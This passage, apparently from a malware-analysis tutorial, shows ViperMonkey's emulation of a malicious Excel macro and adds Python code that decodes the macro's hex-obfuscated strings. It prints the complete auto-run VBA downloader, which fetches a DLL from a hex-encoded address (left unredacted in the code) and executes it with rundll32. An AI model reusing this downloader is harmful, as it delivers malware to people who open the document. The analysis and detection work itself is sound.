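    found = {}
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".xml"):
                continue
            try:
                items = element_text(zf.read(name))
            except ET.ParseError:
                continue  # skip malformed parts instead of aborting the whole scan
            if items[0][0] == f"{{{XM_NS}}}macrosheet":
                found[name] = [t for tag, t in items if tag.endswith("}f") and t]
    return found
```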

ViperMonkey

A tool that dynamically analyses malicious VBA macros.
It can be used on Docker; running the command below is enough to start the analysis.
The sample is then copied into the container and analysed there.

$ docker/dockermonkey.sh sample.xls
 _    ___                 __  ___            __
| |  / (_)___  ___  _____/  |/  /___  ____  / /_____  __  __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ /  __/ /  / /  / / /_/ / / / / ,< /  __/ /_/ /
|___/_/ .___/\___/_/  /_/  /_/\____/_/ /_/_/|_|\___/\__, /
     /_/                                           /____/
vmonkey 1.0.2 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues

===============================================================================
FILE: /root/sample.xls
-------------------------------------------------------------------------------
VBA MACRO ЭтаКнига.cls
in file:  - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):

Sub Workbook_Open()
Dim euvjhxge As Object
Dim tnukmirrugnryiyq As Object
Dim tdcivbfshcvnxzndtlc As String
Dim frwygfpnfwpcuyrbrni As String
tdcivbfshcvnxzndtlc = fmlnjifrotgwtih("687474703a2f2f36362e3135302e36362e3136372f73752e") & fmlnjifrotgwtih("646c6c")
frwygfpnfwpcuyrbrni = fmlnjifrotgwtih("433a5c5769") & fmlnjifrotgwtih("6e646f77735c5461736b735c73752e646c6c")
Set euvjhxge = CreateObject(fmlnjifrotgwtih("4d6963") & fmlnjifrotgwtih("726f736f66742e584d4c48545450"))
euvjhxge.Open fmlnjifrotgwtih("474554"), tdcivbfshcvnxzndtlc, False
euvjhxge.send
If euvjhxge.Status = 200 Then
Set tnukmirrugnryiyq = CreateObject(fmlnjifrotgwtih("41444f44422e") & fmlnjifrotgwtih("53747265616d"))
tnukmirrugnryiyq.Open
tnukmirrugnryiyq.Type = 1
tnukmirrugnryiyq.Write euvjhxge.responseBody
tnukmirrugnryiyq.SaveToFile frwygfpnfwpcuyrbrni, 2
tnukmirrugnryiyq.Close
End If
Dim ExecFile As Double
ExecFile = Shell(fmlnjifrotgwtih("72756e646c6c333220433a5c57696e646f77735c5461736b735c7375") & fmlnjifrotgwtih("2e646c6c2c20506c7567696e496e6974"))
End Sub





-------------------------------------------------------------------------------
PARSING VBA CODE:
-------------------------------------------------------------------------------
VBA MACRO Лист1.cls
in file:  - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO hdxlonvwk.bas
in file:  - OLE stream: u'_VBA_PROJECT_CUR/VBA/hdxlonvwk'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):

Function fmlnjifrotgwtih(ByVal erhzhqcay As String) As String
Dim pctzqqipfx As Long
For pctzqqipfx = 1 To Len(erhzhqcay) Step 2
fmlnjifrotgwtih = fmlnjifrotgwtih & Chr$(Val("&H" & Mid$(erhzhqcay, pctzqqipfx, 2)))
Next pctzqqipfx
End Function





-------------------------------------------------------------------------------
PARSING VBA CODE:

-------------------------------------------------------------------------------
TRACING VBA CODE (entrypoint = Auto*):

Recorded Actions:
+----------------------+-----------------------------------------------+---------------------------------+
| Action               | Parameters                                    | Description                     |
+----------------------+-----------------------------------------------+---------------------------------+
| Start Regular        |                                               | All wildcard matches will match |
| Emulation            |                                               |                                 |
| Found Entry Point    | workbook_open                                 |                                 |
| CreateObject         | ['Microsoft.XMLHTTP']                         | Interesting Function Call       |
| euvjhxge.Open        | ['GET', 'hxxp://○○○/su.dll', False] | Interesting Function Call       |
| Object.Method Call   | ['GET', 'hxxp://○○○/su.dll', False] | euvjhxge.Open                   |
| GET                  | hxxp://○○○/su.dll                   | Interesting Function Call       |
| CreateObject         | ['ADODB.Stream']                              | Interesting Function Call       |
| tnukmirrugnryiyq.Ope |                                               | Interesting Function Call       |
| n                    |                                               |                                 |
| Object.Method Call   | ['C:\\Windows\\Tasks\\su.dll', 2]             | tnukmirrugnryiyq.SaveToFile     |
| Write File           | C:\Windows\Tasks\su.dll                       | SaveToFile                      |
| Dropped File Hash    | 21eac00ec11c89e381668f3e36bb1b24e98f79a41c44f | File Name: ADODB.Stream         |
|                      | 49b2b7689aa5bb222f1                           |                                 |
| Execute Command      | rundll32 C:\Windows\Tasks\su.dll, PluginInit  | Shell function                  |
+----------------------+-----------------------------------------------+---------------------------------+

Intermediate IOCs:

+---------------------------------------------------------+
hxxp://○○○/su.dll
+---------------------------------------------------------+

VBA Builtins Called: ['Chr', 'CreateObject', 'Len', 'Mid', 'Shell', 'Val']

Decoded Strings (11):
  hxxp://○○○/su.
  dll
  C:\Wi
  ndows\Tasks\su.dll
  Mic
  rosoft.XMLHTTP
  GET
  ADODB.
  Stream
  rundll32 C:\Windows\Tasks\su
  .dll, PluginInit

Finished analyzing /root/sample.xls .

  adding: root/sample.xls_artifacts/ (stored 0%)
  adding: root/sample.xls_artifacts/ADODB.Stream (stored 0%)
[*] Dropped files are in sample.xls_artifacts.zip
[*] Done - Killing docker container c89da96207dbfe2f16469e979ca63ac3bc4a0efac4704526e89b2613570fd817

※ Part of the URL has been replaced.

The report that is produced lists the executed commands, process and registry behaviour, network destinations, and so on.
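The "Decoded Strings" that ViperMonkey recovers by emulation can also be obtained statically for this kind of macro, because the helper shown above simply turns each hex pair into a character with Chr$(Val("&H" ...)). The following is an added example, not ViperMonkey's code: it locates such a helper by its Chr$/Val pattern and decodes every chain of calls to it. The VBA fragment is constructed in the style of the sample and its hex literals encode placeholder values (example.invalid), not the sample's real strings.

```python
import re

# Constructed VBA fragment in the style of the macro shown above. The hex literals
# encode placeholder values (example.invalid), not the sample's real strings.
SAMPLE_VBA = r'''
Sub Workbook_Open()
url = fmlnjifrotgwtih("687474703a2f2f6578616d706c652e696e76616c69642f") & fmlnjifrotgwtih("73752e646c6c")
Set req = CreateObject(fmlnjifrotgwtih("4d6963") & fmlnjifrotgwtih("726f736f66742e584d4c48545450"))
ExecFile = Shell(fmlnjifrotgwtih("72756e646c6c3332"))
End Sub

Function fmlnjifrotgwtih(ByVal erhzhqcay As String) As String
Dim pctzqqipfx As Long
For pctzqqipfx = 1 To Len(erhzhqcay) Step 2
fmlnjifrotgwtih = fmlnjifrotgwtih & Chr$(Val("&H" & Mid$(erhzhqcay, pctzqqipfx, 2)))
Next pctzqqipfx
End Function
'''

# A Function whose body builds characters with Chr$(Val("&H" ...)) is a hex decoder.
DECODER_RE = re.compile(
    r'Function\s+(\w+)\s*\((?:(?!End Function).)*?Chr\$\(Val\("&H"', re.S)


def find_hex_decoder(vba_src: str):
    """Return the name of the hex-decoding helper, or None if none is found."""
    m = DECODER_RE.search(vba_src)
    return m.group(1) if m else None


def vba_hex_decode(hex_str: str) -> str:
    """Python equivalent of the helper: one character per hex pair (Mid$ with Step 2)."""
    return "".join(chr(int(hex_str[i:i + 2], 16)) for i in range(0, len(hex_str), 2))


def decode_string_chains(vba_src: str, decoder: str):
    """Decode every decoder("..") & decoder("..") chain, in source order."""
    call = rf'{re.escape(decoder)}\("([0-9A-Fa-f]*)"\)'
    chain = re.compile(rf'{call}(?:\s*&\s*{call})*')
    results = []
    for m in chain.finditer(vba_src):
        pieces = re.findall(call, m.group(0))  # the hex literal of each call
        results.append("".join(vba_hex_decode(p) for p in pieces))
    return results
```

Joining the pieces of each `&` chain is what turns the split fragments ("Mic" + "rosoft.XMLHTTP") into the complete indicator.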
